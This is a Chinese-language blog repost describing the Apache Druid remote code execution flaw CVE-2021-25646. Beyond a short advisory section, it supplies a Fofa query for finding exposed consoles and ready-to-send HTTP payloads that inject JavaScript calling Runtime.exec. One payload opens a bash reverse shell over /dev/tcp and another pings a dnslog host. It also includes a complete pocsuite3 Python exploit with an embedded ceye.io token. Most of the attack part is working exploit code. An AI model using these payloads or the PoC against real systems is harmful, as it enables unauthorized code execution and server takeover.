一.漏洞概述

Apache Druid 是用Java編寫的面向列的開源分布式數據存儲，旨在快速獲取大量事件數據，并在數據之上提供低延遲查詢。

Apache Druid 默認情況下缺乏授權認證，攻擊者可以發送特制請求，利用Druid服務器上進程的特權執行任意代碼。

Apache Druid包括執行用戶提供的JavaScript的功能嵌入在各種類型請求中的代碼。此功能在用于高信任度環境中，默認已被禁用。但是，在Druid 0.20.0及更低版本中，經過身份驗證的用戶發送惡意請求，利用Apache Druid漏洞可以執行任意代碼。

?

二.影響版本

影響版本：

Apache Druid < 0.20.1

安全版本：

Apache Druid 0.20.1

?

三.漏洞復現

Fofa keyword:

body="Apache Druid console"

Payload：

POST /druid/indexer/v1/sampler HTTP/1.1 Content-Type: application/json User-Agent: Java/1.8.0_211 Host: 192.168.1.198:8888 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 1005{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://www.baidu.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": "true"}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping xxxx.dnslog.cn')}", "": {"enabled": "true"}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

Dnslog執行效果：

POST /druid/indexer/v1/sampler HTTP/1.1 Host: 192.168.1.198:8888 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 1048 Connection: close{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.1.198/23333 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

為該漏洞編寫了一個pocsuite3的poc

#!/usr/bin/env python # coding: utf-8 from urllib.parse import urlparse from pocsuite3.api import requests as req from pocsuite3.api import register_poc from pocsuite3.api import Output, POCBase from pocsuite3.api import POC_CATEGORY, VUL_TYPE import time import random import stringclass TestPOC(POCBase):vulID = '58'version = '1'author = 'zhzyker'vulDate = '2021-02--2'createDate = '2021-02-03'updateDate = '2021-02-03'references = ['https://github.com/zhzyker/vulmap']name = 'Apache Druid 遠程代碼執行漏洞(CVE-2021-25646)'appName = 'Druid'appVersion = '< 0.20.1'vulType = VUL_TYPE.CODE_EXECUTIONcategory = POC_CATEGORY.EXPLOITS.REMOTEdesc = '''Apache Druid包括執行用戶提供的JavaScript的功能嵌入在各種類型請求中的代碼。此功能在用于高信任度環境中，默認已被禁用。但是，在Druid 0.20.0及更低版本中，經過身份驗證的用戶發送惡意請求，利用Apache Druid漏洞可以執行任意代碼。攻擊者可直接構造惡意請求執行任意代碼，控制服務器。'''def _verify(self):result = {}pr = urlparse(self.url)if pr.port:ports = [pr.port]else:ports = [9200]for port in ports:target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)TIMEOUT = 10payload = r'''{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": "true"}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('RECOMMAND')}", "": {"enabled": "true"}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}'''st = ''.join(random.choices(string.ascii_letters, k=8))cmd = "ping " + st + ".6eb4yw.ceye.io"path = "/druid/indexer/v1/sampler"headers = {'Content-Type': 'application/json','Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2','Connection': 'keep-alive'}data = payload.replace("RECOMMAND", cmd)try:self.request = req.post(self.url + path, data=data, headers=headers, timeout=TIMEOUT, verify=False)time.sleep(1)request = req.get("http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns")if st in request.text:result['VerifyInfo'] = {}result['VerifyInfo']['URL'] = targetresult['VerifyInfo']['CMD'] = cmdbreakexcept Exception as e:passreturn self.parse_output(result)def _attack(self):return self._verify()def parse_output(self, result):output = Output(self)if result:output.success(result)else:output.fail('not vulnerability')return outputregister_poc(TestPOC)

?

總結

以上是生活随笔為你收集整理的Apache Druid Console 远程命令执行漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。